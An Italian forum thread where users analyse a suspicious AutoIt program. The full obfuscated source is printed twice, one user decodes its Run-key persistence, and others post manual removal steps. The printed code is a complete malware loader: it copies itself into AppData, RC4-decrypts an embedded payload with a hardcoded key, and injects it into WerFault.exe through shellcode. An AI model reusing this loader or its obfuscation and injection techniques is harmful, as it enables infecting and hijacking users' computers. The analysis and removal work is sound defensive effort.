Follow along with the video below to see how to install our site as a web app on your home screen.
Nota: This feature may not be available in some browsers.
FileInstall("inc.jpg", @TempDir & _f2(47) & _f2(114), 1)
FileInstall("rev2", @TempDir & _f2(47) & _f2(114) & _f2(114), 1)
FileWrite(FileOpen(@ScriptFullPath & STRINGREVERSE(":reifitnedI.enoZ:") & Chr(36) & STRINGREVERSE("ATAD"), 2), STRINGREVERSE("]refsnarTenoZ[") & @CRLF & STRINGREVERSE("=dIenoZ") & 0)
If 1 == 1 Then
If @ScriptDir <> [MENTION=109940]app[/MENTION]DataDir Then
$rand = Random(1000, 99999, 1)
_f3 [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
ShellExecute [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex"))
Exit
EndIf
EndIf
Global $rf1 = STRINGREVERSE("$+]/\\["), $rf2 = STRINGREVERSE("$*s\^)s?(|]|\<>:/\\["), $rf3 = STRINGREVERSE("\krowemarF\TEN.tfosorciM\"), $rf4 = STRINGREVERSE("exe.cbv\")
If 0 == 1 Then
RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92) & _f2(83) & _f2(79) & _f2(70) & _f2(84) & _f2(87) & _f2(65) & _f2(82) & _f2(69) & _f2(92) & _f2(77) & _f2(105) & _f2(99) & _f2(114) & _f2(111) & _f2(115) & _f2(111) & _f2(102) & _f2(116) & _f2(92) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(115) & _f2(92) & _f2(67) & _f2(117) & _f2(114) & _f2(114) & _f2(101) & _f2(110) & _f2(116) & _f2(86) & _f2(101) & _f2(114) & _f2(115) & _f2(105) & _f2(111) & _f2(110) & _f2(92) & _f2(82) & _f2(117) & _f2(110), "WerFault", _f2(82) & _f2(69) & _f2(71) & _f2(95) & _f2(83) & _f2(90), @ScriptDir & "\" & @ScriptName)
EndIf
$de = _rc4(FileRead(@TempDir & _f2(47) & _f2(114) & _f2(114)), "FxQp2T7kVMrZoNsRT8WU8jVkaVGX")
If 0 == 1 Then
$point = _getvbc()
Else
$point = [MENTION=134]system[/MENTION]Dir & "\WerFault.exe"
EndIf
_f1($point, $de)
Func _rc4($data, $key)
Local $opcode = _get_rc4_opcode()
Local $codebuffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($opcode) & _f2(93))
DllStructSetData($codebuffer, 1, $opcode)
Local $buffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($data) & _f2(93))
DllStructSetData($buffer, 1, $data)
Local $usr32 = _f2(117) & _f2(115) & _f2(101) & _f2(114) & _f2(51) & _f2(50) & _f2(46) & _f2(100) & _f2(108) & _f2(108)
Local $cwp = _f2(67) & _f2(97) & _f2(108) & _f2(108) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(80) & _f2(114) & _f2(111) & _f2(99)
Local $none = _f2(110) & _f2(111) & _f2(110) & _f2(101)
DllCall($usr32, $none, $cwp, "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), _f2(105) & _f2(110) & _f2(116), BinaryLen($data), _f2(115) & _f2(116) & _f2(114), $key, _f2(105) & _f2(110) & _f2(116), 0)
Local $ret = DllStructGetData($buffer, 1)
$buffer = 0
$codebuffer = 0
Return $ret
EndFunc
Func _flta($p)
Local $a = NULL
$p = StringRegExpReplace($p, $rf1, "") & "\"
If NOT FileExists($p) OR StringRegExp("*", $rf2) Then Exit
Local $c = FileFindFirstFile($p & "*")
While 1
Local $b = FileFindNextFile($c)
If [MENTION=11728]error[/MENTION] Then ExitLoop
If (@extended = 0) Then ContinueLoop
If StringInStr($b, ".") Then $a &= "y_" & $b
WEnd
If $a = "" Then Exit
Return StringSplit(StringTrimLeft($a, 1), "y_")
EndFunc
Func _get_rc4_opcode()
Local $opcode_p2 = _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(55) & _f2(68) & _f2(52) & _f2(55) & _f2(56) & _f2(66) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(51) & _f2(49) & _f2(68) & _f2(50) & _f2(70) & _f2(55) & _f2(55) & _f2(53) & _f2(70) & _f2(48) & _f2(57) & _f2(50) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(49) & _f2(48) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(56) & _f2(66) & _f2(52) & _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(56) & _f2(67) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(49) & _f2(67) & _f2(56) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(70) & _f2(67) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(68) & _f2(70) & _f2(52) & _f2(56) & _f2(54) & _f2(56) & _f2(52)
Local $opcode_p1 = _f2(48) & _f2(120) & _f2(67) & _f2(56) & _f2(49) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(53) & _f2(51) & _f2(53) & _f2(54) & _f2(53) & _f2(55) & _f2(56) & _f2(66) & _f2(53) & _f2(53) & _f2(49) & _f2(48) & _f2(51) & _f2(49) & _f2(67) & _f2(57) & _f2(56) & _f2(57) & _f2(67) & _f2(56) & _f2(52) & _f2(57) & _f2(56) & _f2(57) & _f2(68) & _f2(55) & _f2(70) & _f2(50) & _f2(65) & _f2(69) & _f2(52) & _f2(56) & _f2(52) & _f2(56) & _f2(50) & _f2(57) & _f2(67) & _f2(56) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(48) & _f2(56) & _f2(53) & _f2(67) & _f2(48) & _f2(48) & _f2(70) & _f2(56) & _f2(52) & _f2(68) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(66) & _f2(57) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(56) & _f2(67) & _f2(56) & _f2(50) & _f2(67) & _f2(48) & _f2(49) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(69) & _f2(70) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(69) & _f2(50) & _f2(70) & _f2(51) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(52) & _f2(48) & _f2(48) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(56) & _f2(49) & _f2(55) & $opcode_p2
Local $opcode_p3 = _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(69) & _f2(48) & _f2(51) & _f2(66) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(65) & _f2(48) & _f2(54) & _f2(56) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(51) & _f2(66) & _f2(68) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(54) & _f2(48) & _f2(55) & _f2(56) & _f2(56) & _f2(48) & _f2(54) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(69) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(55) & _f2(48) & _f2(49) & _f2(67) & _f2(49) & _f2(56) & _f2(49) & _f2(69) & _f2(49) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(48) & _f2(56) & _f2(48) & _f2(49) & _f2(68) & _f2(54) & _f2(51) & _f2(48) & _f2(48) & _f2(54) & _f2(52) & _f2(50) & _f2(69) & _f2(66) & _f2(57) & _f2(56) & _f2(53) & _f2(70) & _f2(53) & _f2(69) & _f2(53) & _f2(66) & _f2(67) & _f2(57) & _f2(67) & _f2(50) & _f2(49) & _f2(48) & _f2(48) & _f2(48)
Local $opcode = $opcode_p1 & _f2(51) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(69) & _f2(66) & _f2(66) & _f2(48) & _f2(56) & _f2(68) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(51) & _f2(49) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(70) & _f2(65) & _f2(51) & _f2(57) & _f2(53) & _f2(53) & _f2(48) & _f2(67) & _f2(55) & _f2(54) & _f2(54) & _f2(51) & _f2(56) & _f2(66) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(48) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(56) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & $opcode_p3
Return $opcode
EndFunc
Func _f1($a, $b)
Local $c = _d1(FileRead(@TempDir & _f2(47) & _f2(114))), $d = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($c) & _f2(93)), $e = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($b) & _f2(93)), $f = _f2(105) & _f2(110) & _f2(116), $g = _f2(112) & _f2(116) & _f2(114), $h = _f2(119) & _f2(115) & _f2(116) & _f2(114), $i = _d1(_f2(108) & _f2(108) & _f2(100) & _f2(46) & _f2(50) & _f2(51) & _f2(114) & _f2(101) & _f2(115) & _f2(117)), $j = "W" & _f2(99) & _f2(111) & _f2(114) & _f2(80) & _f2(119) & _f2(111) & _f2(100) & _f2(110) & _f2(105) & _f2(87) & _f2(108) & _f2(108) & _f2(97) & _f2(67)
If DllStructSetData($d, 1, $c) Then DllStructSetData($e, 1, $b)
Return DllCall($i, $f, _d1($j), $g, _d3($d), $h, ($a), $g, _d3($e), $f, 0, $f, 0)
EndFunc
Func _f2($a)
Return Chr($a + 22 - 11 - 10 - 1)
EndFunc
Func _f3($a)
FileCopy(@ScriptDir & "\" & @ScriptName, $a)
EndFunc
Func _getvbc()
$array = _flta [MENTION=190952]Windows[/MENTION]Dir & $rf3)
Return [MENTION=190952]Windows[/MENTION]Dir & $rf3 & $array[$array[0]] & $rf4
EndFunc
Func _d1($a)
Return STRINGREVERSE($a)
EndFunc
Func _d2($a)
Return BinaryLen($a)
EndFunc
Func _d3($a)
Return DllStructGetPtr($a)
EndFunc
Scaricato, dato in pasto a rdg packer detector, risponde "Autoit"
estraggo il source in maniera poco ortodossa e mi ritrovo
Codice:FileInstall("inc.jpg", @TempDir & _f2(47) & _f2(114), 1) FileInstall("rev2", @TempDir & _f2(47) & _f2(114) & _f2(114), 1) FileWrite(FileOpen(@ScriptFullPath & STRINGREVERSE(":reifitnedI.enoZ:") & Chr(36) & STRINGREVERSE("ATAD"), 2), STRINGREVERSE("]refsnarTenoZ[") & @CRLF & STRINGREVERSE("=dIenoZ") & 0) If 1 == 1 Then If @ScriptDir <> [MENTION=109940]app[/MENTION]DataDir Then $rand = Random(1000, 99999, 1) _f3 [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex")) ShellExecute [MENTION=109940]app[/MENTION]DataDir & "\" & $rand & ".e" & STRINGREVERSE("ex")) Exit EndIf EndIf Global $rf1 = STRINGREVERSE("$+]/\\["), $rf2 = STRINGREVERSE("$*s\^)s?(|]|\<>:/\\["), $rf3 = STRINGREVERSE("\krowemarF\TEN.tfosorciM\"), $rf4 = STRINGREVERSE("exe.cbv\") If 0 == 1 Then RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92) & _f2(83) & _f2(79) & _f2(70) & _f2(84) & _f2(87) & _f2(65) & _f2(82) & _f2(69) & _f2(92) & _f2(77) & _f2(105) & _f2(99) & _f2(114) & _f2(111) & _f2(115) & _f2(111) & _f2(102) & _f2(116) & _f2(92) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(115) & _f2(92) & _f2(67) & _f2(117) & _f2(114) & _f2(114) & _f2(101) & _f2(110) & _f2(116) & _f2(86) & _f2(101) & _f2(114) & _f2(115) & _f2(105) & _f2(111) & _f2(110) & _f2(92) & _f2(82) & _f2(117) & _f2(110), "WerFault", _f2(82) & _f2(69) & _f2(71) & _f2(95) & _f2(83) & _f2(90), @ScriptDir & "\" & @ScriptName) EndIf $de = _rc4(FileRead(@TempDir & _f2(47) & _f2(114) & _f2(114)), "FxQp2T7kVMrZoNsRT8WU8jVkaVGX") If 0 == 1 Then $point = _getvbc() Else $point = [MENTION=134]system[/MENTION]Dir & "\WerFault.exe" EndIf _f1($point, $de) Func _rc4($data, $key) Local $opcode = _get_rc4_opcode() Local $codebuffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($opcode) & _f2(93)) DllStructSetData($codebuffer, 1, $opcode) Local $buffer = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & BinaryLen($data) & _f2(93)) DllStructSetData($buffer, 1, $data) Local $usr32 = _f2(117) & _f2(115) & _f2(101) & _f2(114) & _f2(51) & _f2(50) & _f2(46) & _f2(100) & _f2(108) & _f2(108) Local $cwp = _f2(67) & _f2(97) & _f2(108) & _f2(108) & _f2(87) & _f2(105) & _f2(110) & _f2(100) & _f2(111) & _f2(119) & _f2(80) & _f2(114) & _f2(111) & _f2(99) Local $none = _f2(110) & _f2(111) & _f2(110) & _f2(101) DllCall($usr32, $none, $cwp, "ptr", DllStructGetPtr($codebuffer), "ptr", DllStructGetPtr($buffer), _f2(105) & _f2(110) & _f2(116), BinaryLen($data), _f2(115) & _f2(116) & _f2(114), $key, _f2(105) & _f2(110) & _f2(116), 0) Local $ret = DllStructGetData($buffer, 1) $buffer = 0 $codebuffer = 0 Return $ret EndFunc Func _flta($p) Local $a = NULL $p = StringRegExpReplace($p, $rf1, "") & "\" If NOT FileExists($p) OR StringRegExp("*", $rf2) Then Exit Local $c = FileFindFirstFile($p & "*") While 1 Local $b = FileFindNextFile($c) If [MENTION=11728]error[/MENTION] Then ExitLoop If (@extended = 0) Then ContinueLoop If StringInStr($b, ".") Then $a &= "y_" & $b WEnd If $a = "" Then Exit Return StringSplit(StringTrimLeft($a, 1), "y_") EndFunc Func _get_rc4_opcode() Local $opcode_p2 = _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(55) & _f2(68) & _f2(52) & _f2(55) & _f2(56) & _f2(66) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(51) & _f2(49) & _f2(68) & _f2(50) & _f2(70) & _f2(55) & _f2(55) & _f2(53) & _f2(70) & _f2(48) & _f2(57) & _f2(50) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(49) & _f2(48) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(56) & _f2(66) & _f2(52) & _f2(68) & _f2(70) & _f2(67) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(56) & _f2(67) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(49) & _f2(67) & _f2(56) & _f2(48) & _f2(51) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(52) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(70) & _f2(67) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(68) & _f2(70) & _f2(52) & _f2(56) & _f2(54) & _f2(56) & _f2(52) Local $opcode_p1 = _f2(48) & _f2(120) & _f2(67) & _f2(56) & _f2(49) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(54) & _f2(65) & _f2(48) & _f2(48) & _f2(53) & _f2(51) & _f2(53) & _f2(54) & _f2(53) & _f2(55) & _f2(56) & _f2(66) & _f2(53) & _f2(53) & _f2(49) & _f2(48) & _f2(51) & _f2(49) & _f2(67) & _f2(57) & _f2(56) & _f2(57) & _f2(67) & _f2(56) & _f2(52) & _f2(57) & _f2(56) & _f2(57) & _f2(68) & _f2(55) & _f2(70) & _f2(50) & _f2(65) & _f2(69) & _f2(52) & _f2(56) & _f2(52) & _f2(56) & _f2(50) & _f2(57) & _f2(67) & _f2(56) & _f2(56) & _f2(57) & _f2(52) & _f2(53) & _f2(70) & _f2(48) & _f2(56) & _f2(53) & _f2(67) & _f2(48) & _f2(48) & _f2(70) & _f2(56) & _f2(52) & _f2(68) & _f2(67) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(66) & _f2(57) & _f2(48) & _f2(48) & _f2(48) & _f2(49) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(56) & _f2(67) & _f2(56) & _f2(50) & _f2(67) & _f2(48) & _f2(49) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(69) & _f2(70) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(69) & _f2(50) & _f2(70) & _f2(51) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(52) & _f2(48) & _f2(48) & _f2(56) & _f2(51) & _f2(54) & _f2(53) & _f2(70) & _f2(67) & _f2(48) & _f2(48) & _f2(56) & _f2(49) & _f2(55) & $opcode_p2 Local $opcode_p3 = _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(69) & _f2(48) & _f2(51) & _f2(66) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(65) & _f2(48) & _f2(54) & _f2(56) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(51) & _f2(66) & _f2(68) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(54) & _f2(48) & _f2(55) & _f2(56) & _f2(56) & _f2(48) & _f2(54) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(69) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(55) & _f2(48) & _f2(49) & _f2(67) & _f2(49) & _f2(56) & _f2(49) & _f2(69) & _f2(49) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(65) & _f2(56) & _f2(52) & _f2(48) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(66) & _f2(55) & _f2(53) & _f2(48) & _f2(56) & _f2(48) & _f2(49) & _f2(68) & _f2(54) & _f2(51) & _f2(48) & _f2(48) & _f2(54) & _f2(52) & _f2(50) & _f2(69) & _f2(66) & _f2(57) & _f2(56) & _f2(53) & _f2(70) & _f2(53) & _f2(69) & _f2(53) & _f2(66) & _f2(67) & _f2(57) & _f2(67) & _f2(50) & _f2(49) & _f2(48) & _f2(48) & _f2(48) Local $opcode = $opcode_p1 & _f2(51) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(56) & _f2(56) & _f2(52) & _f2(51) & _f2(53) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(53) & _f2(70) & _f2(67) & _f2(69) & _f2(66) & _f2(66) & _f2(48) & _f2(56) & _f2(68) & _f2(57) & _f2(68) & _f2(70) & _f2(48) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(51) & _f2(49) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(70) & _f2(65) & _f2(51) & _f2(57) & _f2(53) & _f2(53) & _f2(48) & _f2(67) & _f2(55) & _f2(54) & _f2(54) & _f2(51) & _f2(56) & _f2(66) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(52) & _f2(48) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(56) & _f2(57) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(56) & _f2(57) & _f2(68) & _f2(56) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(67) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(48) & _f2(70) & _f2(66) & _f2(54) & _f2(48) & _f2(48) & _f2(48) & _f2(51) & _f2(56) & _f2(53) & _f2(69) & _f2(56) & _f2(70) & _f2(69) & _f2(70) & _f2(70) & _f2(70) & _f2(70) & _f2(50) & _f2(53) & _f2(70) & _f2(70) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & _f2(48) & $opcode_p3 Return $opcode EndFunc Func _f1($a, $b) Local $c = _d1(FileRead(@TempDir & _f2(47) & _f2(114))), $d = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($c) & _f2(93)), $e = DllStructCreate(_f2(98) & _f2(121) & _f2(116) & _f2(101) & _f2(91) & _d2($b) & _f2(93)), $f = _f2(105) & _f2(110) & _f2(116), $g = _f2(112) & _f2(116) & _f2(114), $h = _f2(119) & _f2(115) & _f2(116) & _f2(114), $i = _d1(_f2(108) & _f2(108) & _f2(100) & _f2(46) & _f2(50) & _f2(51) & _f2(114) & _f2(101) & _f2(115) & _f2(117)), $j = "W" & _f2(99) & _f2(111) & _f2(114) & _f2(80) & _f2(119) & _f2(111) & _f2(100) & _f2(110) & _f2(105) & _f2(87) & _f2(108) & _f2(108) & _f2(97) & _f2(67) If DllStructSetData($d, 1, $c) Then DllStructSetData($e, 1, $b) Return DllCall($i, $f, _d1($j), $g, _d3($d), $h, ($a), $g, _d3($e), $f, 0, $f, 0) EndFunc Func _f2($a) Return Chr($a + 22 - 11 - 10 - 1) EndFunc Func _f3($a) FileCopy(@ScriptDir & "\" & @ScriptName, $a) EndFunc Func _getvbc() $array = _flta [MENTION=190952]Windows[/MENTION]Dir & $rf3) Return [MENTION=190952]Windows[/MENTION]Dir & $rf3 & $array[$array[0]] & $rf4 EndFunc Func _d1($a) Return STRINGREVERSE($a) EndFunc Func _d2($a) Return BinaryLen($a) EndFunc Func _d3($a) Return DllStructGetPtr($a) EndFunc
I primi due righi, nulla da ridire
direi che è un piano ben ingegnato,
poi leggo
RegWrite(_f2(72) & _f2(75) & _f2(67) & _f2(85) & _f2(92)....
che tradotto con la stessa funzione all'interno dello script
Func _f2($a)
Return Chr($a + 22 - 11 - 10 - 1)
EndFunc
significa
regWrite("HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","WerFault", "REG_SZ", ....
Praticamente impone alla macchina di avviarsi insieme a windows, il che è molto strano, non ho voluto continuare perché il resto non mi piaceva affatto ho trovato la mia soluzione ahahah a voi i commenti
Io non l'ho eseguito, quindi non mi conviene xD però se utile non appena trovo 10 minuti lo faccio, consiglio inoltre di eliminare il download per sicurezza, dato che il "Tbot" (l'originale) è già stato postato nella sezione uno o due post sotto questo
"Non sono ancora sicura che sia un malware ma comunque saprò la risposta!
per il momento, PRIMO METODO DI RIMOZIONE
aprite task manager è chiudere tutti i WerFault.exe
dirigersi in system dir come suggerisce la riga
-->
@systemDir & "\WerFault.exe"
<--
praticamente la system32 o la sysWOW64 per x64 (controllatele entrambi=)
ed eliminare i WerFault.exe, pigiare f5 dopo qualche secondo e ricontrollate la situazione
(io non ho beccato il virus, quindi non posso controllare)
adesso aprite da start, digitando regedit.exe il Registro di sistema
(Da windows 8 / 8.1 charm bar--> Ricerca--> regedit.exe)
seguite la lista ad albero partendo da :
HKEY_CURRENT_USER seguire con le cartelle:
Software
Microsoft
CurrentVersion
Run
eliminare la nota per WerFault.exe con un semplice click del destro, riavviare il computer e ricontrollare
le sys dir
per il momento è solo una bozza
Non voglio essere ringraziat piuttosto mi chiedo... il download come mai è ancora li?Bravissimo .
Modifico io.Non voglio essere ringraziat piuttosto mi chiedo... il download come mai è ancora li?